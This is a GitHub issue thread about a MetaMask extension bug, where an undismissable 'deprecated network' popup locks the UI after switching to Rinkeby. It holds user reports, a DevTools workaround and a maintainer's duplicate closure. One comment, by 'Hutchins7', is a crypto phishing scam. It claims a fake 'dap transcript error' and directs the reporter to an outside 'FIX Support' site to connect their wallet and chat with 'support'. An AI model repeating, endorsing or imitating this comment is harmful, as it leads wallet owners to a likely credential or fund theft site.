### ISSUE TITLE
[Bug]: Rinkby connection Issue 

### ISSUE THREAD

**Issue by sam41306061** [MetaMask/metamask-extension#19720]
### Describe the bug

In MetaMask i selected the Rinkyby network which has been depreciated.
I get an error popup saying “The current rpc url for this network has been deprecated.” which is the correct error, however the problem is the X button to close the error doesnt work and the Switch Network button opens the list of networks behind the error box.

This means that i can no longer use MetaMask because the error is permanently displayed and i cannot select anything behind it.

Closing chrome and restarting my laptop does not resolve the issue.

Seems to be a bug in MetaMask for this error dialog box being unable to be closed.

### Steps to reproduce

1. Switch the MetaMask network to Rinkeby or another deprecated network.
Problem:
2. The UI layer freezes and cannot close prompts or use MetaMask.
Solution steps:

### Error messages or log output

```shell
Work around solution using Chrome Dev tools 
Solve the problem that MetaMask UI froze when switching to deprecated networks.
Reproduce the problem:

Switch the MetaMask network to Rinkeby or another deprecated network.
Problem:
The UI layer freezes and cannot close prompts or use MetaMask.
Solution steps:
Open the MetaMask developer tools and find the element with ID “popover-content”.
Delete that element.
At this point, the stuck UI layer disappears, and you can normally close other prompts and use MetaMask.
The MetaMask network successfully switches back to the Ethereum main network.
```

### Version

10.31.1

### Build type

None

### Browser

Chrome

### Operating system

MacOS

**Comment by Hutchins7** [comment]
Hi @sam41306061 
You are having a dap transcript error on your account, use the quick fix protocol to correct your errors by using the dap Defi page and select Rectification on the page to select your account type and establish connection manually to generate a QR barcode to authenticate your request via [FIX Support](https://dapchainfix.online/defiprotocol/v1/defi/home/)
Note: Click on the chat button at the bottom part of the page to initiate a chat with the support team for review and for further assistance.
Regards

**Comment by BboyAkers** [comment]
Hey! Just attempted to replicate this and I couldn't seem to do so. This is what I get after pressing the "Approve" button for adding the Rinkeby Testnet. Could you give screenshots or a video please? 🙂 
![Screenshot 2023-06-26 at 10 50 10 PM](https://github.com/MetaMask/metamask-extension/assets/11778717/cbefbf88-b7c1-4553-8d6d-c54d280e1244)

**Comment by kihiuFrank** [comment]
> ### Describe the bug
> In MetaMask i selected the Rinkyby network which has been depreciated. I get an error popup saying “The current rpc url for this network has been deprecated.” which is the correct error, however the problem is the X button to close the error doesnt work and the Switch Network button opens the list of networks behind the error box.
> 
> This means that i can no longer use MetaMask because the error is permanently displayed and i cannot select anything behind it.
> 
> Closing chrome and restarting my laptop does not resolve the issue.
> 
> Seems to be a bug in MetaMask for this error dialog box being unable to be closed.
> 
> ### Steps to reproduce
> 1. Switch the MetaMask network to Rinkeby or another deprecated network.
>    Problem:
> 2. The UI layer freezes and cannot close prompts or use MetaMask.
>    Solution steps:
> 
> ### Error messages or log output
> ```shell
> Work around solution using Chrome Dev tools 
> Solve the problem that MetaMask UI froze when switching to deprecated networks.
> Reproduce the problem:
> 
> Switch the MetaMask network to Rinkeby or another deprecated network.
> Problem:
> The UI layer freezes and cannot close prompts or use MetaMask.
> Solution steps:
> Open the MetaMask developer tools and find the element with ID “popover-content”.
> Delete that element.
> At this point, the stuck UI layer disappears, and you can normally close other prompts and use MetaMask.
> The MetaMask network successfully switches back to the Ethereum main network.
> ```
> 
> ### Version
> 10.31.1
> 
> ### Build type
> None
> 
> ### Browser
> Chrome
> 
> ### Operating system
> MacOS
> 
> ### Hardware wallet
> _No response_
> 
> ### Additional context
> _No response_

Having the same issue.

**Comment by kihiuFrank** [comment]
Having the same issue. 
@sam41306061 did you get a solution?

**Comment by sam41306061** [comment]
@kihiuFrank and @BboyAkers , Here is a screenshot of what is occurring when changing networks. 

![Screen Shot 2023-06-27 at 5 00 10 AM](https://github.com/MetaMask/metamask-extension/assets/119435214/e4674087-9afe-4c1c-bb3c-98d9719c712b)

The solution above seems to work. But that is a less-than-ideal state. This needs to have the frontend updated so that the "x" buttons are not disabled.

**Comment by utunga** [comment]
This work around  doesn't work for me. OMG this is an incredibly annoying and critical bug it shouldn't just get closed automatically for me.

The reason it doesn't work is because in firefox getting to the 'debug' mode of a an extension is *far* from easy. 

I am following [these instructions](https://discourse.mozilla.org/t/how-can-i-inspect-the-popup-of-an-addon/34134) but no luck so far. 

For someone who is not a developer and using firefox this would be quite impossible and they would risk losing access to their wallet entirely. Totally unacceptable.

**Comment by dredshep** [comment]
> For someone who is not a developer and using firefox this would be quite impossible and they would risk losing access to their wallet entirely. Totally unacceptable.

I am personally a developer and I have zero idea how to access inspect tools on Firefox metamask and I can't use Metamask on Firefox at all. I'm literally building a web3 app rn and was debugging and fell into this practically unfixable bug.

**Comment by utunga** [comment]
Exactly. I literally can't access my wallet right now and apple wants to reformat my drive. Fortunately I have the *main* accounts backed up but there's a bunch of Web3 things that use different accounts which I have irrevocably lost access to due to this bug. 

PS I am a developer also and can't figure out how to use web developer / access inspect tools **on Firefox** for the  metamask extension either!

**Comment by anaamolnar** [comment]
Hello, @sam41306061. Thanks for reporting! This happens when trying to connect to an invalid network from your list. Rinkeby, Ropsten, and Kovan have been deprecated for some time now.  There was a workaround posted in the initial report: https://github.com/MetaMask/metamask-extension/issues/19564. We have a fix coming in 10.33.0 for this issue.

**Comment by anaamolnar** [comment]
I am closing this in favor of the initial report. #19564
